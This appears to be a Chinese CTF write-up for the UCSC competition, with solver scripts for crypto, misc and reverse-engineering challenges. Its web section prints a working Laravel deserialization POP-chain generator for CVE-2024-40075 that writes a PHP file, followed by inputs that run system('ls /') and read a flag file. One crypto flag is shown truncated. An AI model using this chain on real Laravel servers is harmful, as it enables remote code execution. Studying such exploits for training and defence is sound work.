WEB

ezLaravel-ucsc(Laravel框架漏洞)

CVE-2024-40075,参考文章Laravel v11.x PHP反序列化漏洞分析(CVE-2024-40075)-先知社区

routes/web.php中找到源码如下

// Challenge route from routes/web.php: the "str" request parameter is
// base64-decoded and handed to unserialize().
Route::get('/', function (\Illuminate\Http\Request $request) {

// Client-controlled input: whatever is sent in "str" reaches the lines below.
$str = base64_decode($request->input("str"));
// Single-substring blocklist: only payloads containing "pearcmd"
// (case-insensitive) are rejected. Every other serialized object passes.
if(preg_match("/pearcmd/i",$str)){
exit("这个不行");
}
// Root cause: unserialize() on untrusted data instantiates any autoloadable
// class and runs its magic methods. A blocklist does not change that.
// Defensive options: exchange data as JSON (json_decode) instead, or call
// unserialize($str, ['allowed_classes' => false]) so no objects are created.
// The return value is discarded; the call is made only for its side effects.
unserialize($str);
return "CTF";
});

那么就要找到链子,参考文章中的pop链

<?php
// Stub declared under the same namespace and class name as the Termwind
// library class. serialize() stores only the class name and property values,
// so the stub declares no methods.
namespace Termwind\ValueObjects{
Class Styles{
private array $textModifiers;
private array $properties;
public function __construct(){
// Values chosen by the payload author: the name of a PHP function and the
// data intended for it. How the real library class consumes these two
// arrays is covered in the referenced article, not in this listing.
$this->textModifiers = ["file_put_contents"];
$this->properties = ["styles"=>"<?php phpinfo();?>", "parentStyles"=>0];
}
}
}
// Stubs for Termwind\Components\Element and its subclass Hr. Only the two
// protected properties are declared; the object graph, not behaviour, is what
// gets serialized.
namespace Termwind\Components{
use Termwind\ValueObjects\Styles;
abstract Class Element{
protected string $content;
protected Styles $styles;
public function __construct()
{
// A file name plus a nested Styles object built by the stub in the
// Termwind\ValueObjects namespace.
$this->content = 'testtesttest.php';
$this->styles = new Styles();
}
}
// Concrete subclass: Element is abstract and cannot be instantiated itself.
Class Hr extends Element{}
}
// Stubs for Psy\Readline\Hoa\Stream and its subclass FileRead. The only state
// is $_bucket, populated with a single Hr object.
namespace Psy\Readline\Hoa{
use Termwind\Components\Hr;

abstract Class Stream{
protected $_bucket;
public function __construct(){
$this->_bucket = [new Hr()];
}
}
// Concrete subclass: Stream is abstract and cannot be instantiated itself.
Class FileRead extends Stream {}
}

// Stub for Monolog\Handler\GroupHandler, the outermost object of the
// serialized graph. Its $handlers array holds one FileRead object.
namespace Monolog\Handler{
use Psy\Readline\Hoa\FileRead;
Class GroupHandler{
protected array $handlers;
public function __construct(){
$this->handlers = [new FileRead()];
}
}
}

// Global namespace: build the outermost object and print its serialized form
// base64-encoded, the encoding the challenge route decodes before calling
// unserialize().
// Detection cue for defenders: once decoded, the request parameter is a PHP
// serialized object naming library classes such as Monolog\Handler\GroupHandler
// and Termwind\ValueObjects\Styles. Request data has no legitimate reason to
// carry serialized framework objects.
namespace {
$obj = new Monolog\Handler\GroupHandler();
echo base64_encode(serialize($obj));
}

注意这里如果是写一句话木马写上去有点问题,直接读文件就行

<?php phpinfo();?>
<?php eval('system(\"ls /\")');?>
<?php eval('system(\"cat /flag.sh\")');?>

CRYPTO

XR4-ucsc

import base64
import random

def init_sbox(key):
    """Run the RC4 key schedule and return the initial 256-entry state.

    ``key`` is a non-empty string; each character contributes its code point
    through ``ord``. The result is a fresh list holding a permutation of
    0..255.
    """
    state = list(range(256))
    key_len = len(key)
    swap_at = 0
    for pos in range(256):
        # Mix the current state entry and the (cyclically repeated) key
        # character into the swap position.
        swap_at = (swap_at + state[pos] + ord(key[pos % key_len])) % 256
        state[pos], state[swap_at] = state[swap_at], state[pos]
    return state

def decrypt(cipher, box):
    """Base64-decode ``cipher`` and XOR it with the RC4 keystream from ``box``.

    ``box`` is a 256-entry state as produced by ``init_sbox``. It is permuted
    in place while the keystream is generated, so pass a copy if the state is
    needed again. Each output byte is returned as one character via ``chr``.
    """
    x = y = 0
    plain_chars = []
    for enc_byte in base64.b64decode(cipher):
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        keystream_byte = box[(box[x] + box[y]) % 256]
        plain_chars.append(chr(enc_byte ^ keystream_byte))
    return ''.join(plain_chars)

# Step 1: recover the PRNG seed. The base64 ciphertext is decrypted with the
# stream cipher keyed by "XR4"; the plaintext is the seed in decimal.
ciphertext = "MjM184anvdA="
key = "XR4"
box = init_sbox(key)
# decrypt() permutes the state it is given, so hand it a copy and keep `box` intact.
a = decrypt(ciphertext, box.copy())
seed_num = int(a)
print(f"Decrypted seed: {seed_num}")

# Step 2: rebuild the data array. The challenge provides the matrix transposed.
transposed_matrix = [
    [1, 111, 38, 110, 95, 44],
    [11, 45, 58, 39, 84, 1],
    [116, 19, 113, 60, 91, 118],
    [33, 98, 38, 57, 10, 29],
    [68, 52, 119, 56, 43, 125],
    [32, 32, 7, 26, 41, 41],
]

# Transposing once more restores the original 6x6 layout ...
original_matrix = [list(column) for column in zip(*transposed_matrix)]
# ... which is then flattened row by row into 36 values.
data = [value for row in original_matrix for value in row]
# Step 3: derive the flag from the seed and the data array
def generate_flag(seed, data):
    """Return 36 characters obtained by XORing ``data`` with a seeded mask.

    The module-level ``random`` generator is seeded with ``seed``. For each of
    the 36 positions, ``random.random() * 10000`` is formatted with ten
    decimals and its first two characters are used as the mask when they are
    both digits; otherwise the mask is 0. ``data`` must hold at least 36
    integers.
    """
    random.seed(seed)
    chars = []
    for idx in range(36):
        scaled = f"{random.random() * 10000:.10f}"
        prefix = scaled[:2]
        # A prefix such as "5." (scaled value below 10) is not all digits.
        mask = int(prefix) if prefix.isdigit() else 0
        chars.append(chr(mask ^ data[idx]))
    return ''.join(chars)

# Run Step 3 with the recovered seed and the flattened matrix, then print the result.
flag = generate_flag(seed_num, data)
print(f"Flag: {flag}")

image-20250420143205550

flag{c570ee41-8b09-11ef-ac4a-a4b1c1c5a2d2}

essential-ucsc

import math
from math import gcd

from Crypto.Util.number import inverse, long_to_bytes
from sympy import integer_nthroot, nextprime, prevprime

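# RSA modulus. The search below assumes number2 = p * q with
# p = nextprime(13 * a) and q = prevprime(25 * a) for one unknown integer a.
number2 = 20163906788220322201451577848491140709934459544530540491496316478863216041602438391240885798072944983762763612154204258364582429930908603435291338810293235475910630277814171079127000082991765275778402968190793371421104016122994314171387648385459262396767639666659583363742368765758097301899441819527512879933947

# Estimate a: p * q is close to 13 * 25 * a**2 = 325 * a**2.
approx_a = math.isqrt(number2 // 325)

# Search a small window around the estimate for the exact a.
found = False
for delta in range(-1000, 1000):
    a = approx_a + delta
    p = nextprime(13 * a)
    q = prevprime(25 * a)
    if p * q == number2:
        found = True
        break

if not found:
    raise ValueError("Failed to find a")

phi = (p - 1) * (q - 1)

# Decrypt the first ciphertext (plain RSA: e1 must be invertible modulo phi).
c1 = 6624758244437183700228793390575387439910775985543869953485120951825790403986028668723069396276896827302706342862776605008038149721097476152863529945095435498809442643082504012461883786296234960634593997098236558840899107452647003306820097771301898479134315680273315445282673421302058215601162967617943836306076
e1 = 6035830951309638186877554194461701691293718312181839424149825035972373443231514869488117139554688905904333169357086297500189578624512573983935412622898726797379658795547168254487169419193859102095920229216279737921183786260128443133977458414094572688077140538467216150378641116223616640713960883880973572260683

g1 = gcd(e1, phi)
if g1 != 1:
    raise ValueError("e1 and phi are not coprime")
d1 = inverse(e1, phi)
number3 = pow(c1, d1, number2)
flag_part1 = long_to_bytes(number3).decode('utf-8')
print(flag_part1)

# Decrypt the second ciphertext.
c2 = 204384474875628990804496315735508023717499220909413449050868658084284187670628949761107184746708810539920536825856744947995442111688188562682921193868294477052992835394998910706435735040133361347697720913541458302074252626700854595868437809272878960638744881154520946183933043843588964174947340240510756356766
e2 = 0xe18e  # 57742 (even)

# e2 is even and phi = (p - 1) * (q - 1) is even as well, so gcd(e2, phi) is at
# least 2 and e2 has no inverse modulo phi. Requiring gcd == 1 here always
# raised, leaving only flag_part1 printed.
g2 = gcd(e2, phi)
if g2 == 1:
    d2 = inverse(e2, phi)
    number4 = pow(c2, d2, number2)
else:
    # Divide out the common factor: with d2 = (e2 / g2)^-1 mod phi,
    # c2**d2 == m**g2 (mod number2).
    reduced_e2 = e2 // g2
    if gcd(reduced_e2, phi) != 1:
        raise ValueError("e2 // gcd(e2, phi) and phi are not coprime")
    d2 = inverse(reduced_e2, phi)
    m_to_g2 = pow(c2, d2, number2)
    # An integer root recovers m only when m**g2 is smaller than number2.
    # NOTE(review): not verified against this instance; the check below makes
    # the failure explicit instead of decoding garbage.
    root, exact = integer_nthroot(m_to_g2, g2)
    if not exact:
        raise ValueError("m**g2 wrapped modulo number2; integer root does not recover m")
    number4 = int(root)
flag_part2 = long_to_bytes(number4).decode('utf-8')

flag = flag_part1 + flag_part2
print(flag)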

flag{75811c6d95770d

MERGE_ECC–ucsc

from sage.all import *

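# Part 1 inputs: field modulus, curve coefficients, base point and three
# ciphertext points.
N = 8186762541745429544201163537921168767557829030115874801599552603320381728161132002130533050721684554609459754424458805702284922582219134865036743485620797
a_part1 = 1495420997701481377470828570661032998514190598989197201754979317255564287604311958150666812378959018880028977121896929545639701195491870774156958755735447
b_part1 = 5991466901412408757938889677965118882508317970919705053385317474407117921506012065861844241307270755999163280442524251782766457119443496954015171881396147
P_coords = (6053058761132539206566092359337778642106843252217768817197593657660613775577674830119685211727923302909194735842939382758409841779476679807381619373546323, 7059796954840479182074296506322819844555365317950589431690683736872390418673951275875742138479119268529134101923865062199776716582160225918885119415223226)
cipher0_coords = (4408587937721811766304285221308758024881057826193901720202053016482471785595442728924925855745045433966244594468163087104593409425316538804577603801023861, 5036207336371623412617556622231677184152618465739959524167001889273208946091746905245078901669335908442289383798546066844566618503786766455892065155724816)
cipher1_coords = (2656427748146837510897512086140712942840881743356863380855689945832188909581954790770797146584513962618190767634822273749569907212145053676352384889228875, 4010263650619965046904980178893999473955022015118149348183137418914551275841596653682626506158128955577872592363930977349664669161585732323838763793957500)
cipher2_coords = (1836350123050832793309451054411760401335561429787905037706697802971381859410503854213212757333551949694177845513529651742217132039482986693213175074097638, 1647556471109115097539227566131273446643532340029032358996281388864842086424490493200350147689138143951529796293632149050896423880108194903604646084656434)

# Part 2 inputs: field prime, curve coefficients, base point P and target point Q.
p_part2 = 839252355769732556552066312852886325703283133710701931092148932185749211043
a_part2 = 166868889451291853349533652847942310373752202024350091562181659031084638450
b_part2 = 168504858955716283284333002385667234985259576554000582655928538041193311381
P_part2_coords = (547842233959736088159936218561804098153493246314301816190854370687622130932, 259351987899983557442340376413545600148150183183773375317113786808135411950)
Q_part2_coords = (52509027983019069214323702207915994504051708473855890224511139305828303028, 520507172059483331872189759719244369795616990414416040196069632909579234481)

# Part 1
# Define the Part 1 elliptic curve and lift the coordinates onto it.
E_part1 = EllipticCurve(GF(N), [a_part1, b_part1])
P = E_part1(*P_coords)
cipher = [E_part1(*cipher0_coords), E_part1(*cipher1_coords), E_part1(*cipher2_coords)]

# Recover each n[i] by discrete logarithm; the scalars lie between 1 and 2**20,
# a range small enough to search directly. The bound is written as 2**20
# because this file imports sage.all as a plain Python module, where `2^20`
# is XOR and evaluates to 22, not 1048576; `**` is correct both in plain
# Python and under the Sage preparser.
n = [P.discrete_log(c, bounds=(1, 2**20)) for c in cipher]

# Convert each n[i] to hex (without the "0x" prefix) and concatenate.
part1 = ''.join(hex(ni)[2:] for ni in n)

# Part 2
# Define the Part 2 elliptic curve and lift P and Q onto it.
E_part2 = EllipticCurve(GF(p_part2), [a_part2, b_part2])
P_part2 = E_part2(*P_part2_coords)
Q_part2 = E_part2(*Q_part2_coords)

# Recover the key as the discrete logarithm of Q to base P.
order = P_part2.order()
key = P_part2.discrete_log(Q_part2, order=order)

# Assemble the final flag.
flag = "flag{" + part1 + "-" + str(key) + "}"
print("Recovered flag:", flag)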

MISC

three-ucsc

第一部分按照名字提示盲水印解密

2

part1:8f02d3e7

第二部分先二进制转十六进制,再转ASCII码如下

LS4uLi4tIC0uLS4gLiAtLS0uLiAtLS0tLiAtLi4uLi0gLi4uLi0gLS4uIC0uLi4uIC0uLi4gLS4uLi4tIC0tLS4uIC4uLi0tIC0tLS0tIC4gLS4uLi4t

base64解密如下

-....- -.-. . ---.. ----. -....- ....- -.. -.... -... -....- ---.. ...-- ----- . -....-

摩斯解密如下

-CE89-4D6B-830E-
注意为小写即
-ce89-4d6b-830e-

第三部分看流量,找到

image-20250420142953079

一个个试,发现thinkbell正确,最后一部分为5d0cb5695077

合起来为

flag{8f02d3e7-ce89-4d6b-830e-5d0cb5695077}

RE

easy_re-ucsc

# Original (obfuscated) string
Str = "n=<;:h2<'?8:?'9hl9'h:l>'2>>2>hk=>;:?"
# XOR key: every character of Str is XORed with this value
v7 = 10

# XOR every character of the string with the key
def xor_decrypt(Str, key):
    """Return ``Str`` with each character's code point XORed with ``key``.

    XOR is its own inverse, so the same call both obfuscates and recovers.
    """
    return "".join(chr(ord(symbol) ^ key) for symbol in Str)

# Decrypt the string and print it
decrypted_str = xor_decrypt(Str, v7)
print("解密后的字符串:", decrypted_str)

flag{d7610b86-5205-3bf3-b0f4-84484ba74105}

simplere-ucsc

flag{fc03040506}

EZ_debug-ucsc

def rc4_ksa(key):
    """Run the RC4 key-scheduling algorithm and return the initial state.

    ``key`` is a non-empty sequence of integers (for example ``bytes``). The
    result is a fresh list holding a permutation of 0..255.
    """
    state = list(range(256))
    key_len = len(key)
    swap_at = 0
    for pos in range(256):
        # The key is repeated cyclically across all 256 positions.
        swap_at = (swap_at + state[pos] + key[pos % key_len]) % 256
        state[pos], state[swap_at] = state[swap_at], state[pos]
    return state

def rc4_prga(s, data):
    """XOR ``data`` with the RC4 keystream generated from state ``s``.

    ``s`` is a 256-entry state as returned by ``rc4_ksa``. It is permuted in
    place, so pass a copy if the state is needed again. Returns a
    ``bytearray`` of the same length as ``data``.
    """
    x = y = 0
    result = bytearray()
    for value in data:
        x = (x + 1) % 256
        y = (y + s[x]) % 256
        s[x], s[y] = s[y], s[x]
        keystream_byte = s[(s[x] + s[y]) % 256]
        result.append(value ^ keystream_byte)
    return result

# RC4 key as raw bytes.
key = b"UCSC" # [85, 67, 83, 67]
# 36 ciphertext bytes to decrypt.
ciphertext = bytes([
0xF8, 0x3C, 0x7A, 0x0E, 0xEC, 0x83, 0x9B, 0x08,
0x6A, 0x5F, 0xC8, 0x58, 0x38, 0xA8, 0x0E, 0x3F,
0x22, 0x5F, 0x1B, 0x81, 0x39, 0x1E, 0x8A, 0xAB,
0xB1, 0xE9, 0x75, 0x64, 0x7A, 0x30, 0x9F, 0x64,
0x90, 0xBD, 0x7B, 0xAB
])

# Key schedule first, then keystream XOR. rc4_prga permutes the state it is
# given, so it receives a copy.
s = rc4_ksa(key)
plaintext = rc4_prga(s.copy(), ciphertext)
# errors='ignore' silently drops any non-ASCII byte, so a wrong key or
# ciphertext produces shortened output rather than a decode error.
print(plaintext.decode('ascii', errors='ignore'))

image-20250420151258387

flag{709e9bdd-0858-9750-8c37-9b135b31f16d}

tshark.exe -r flag.pcap -T fields -e usb.capdata >usbdata.txt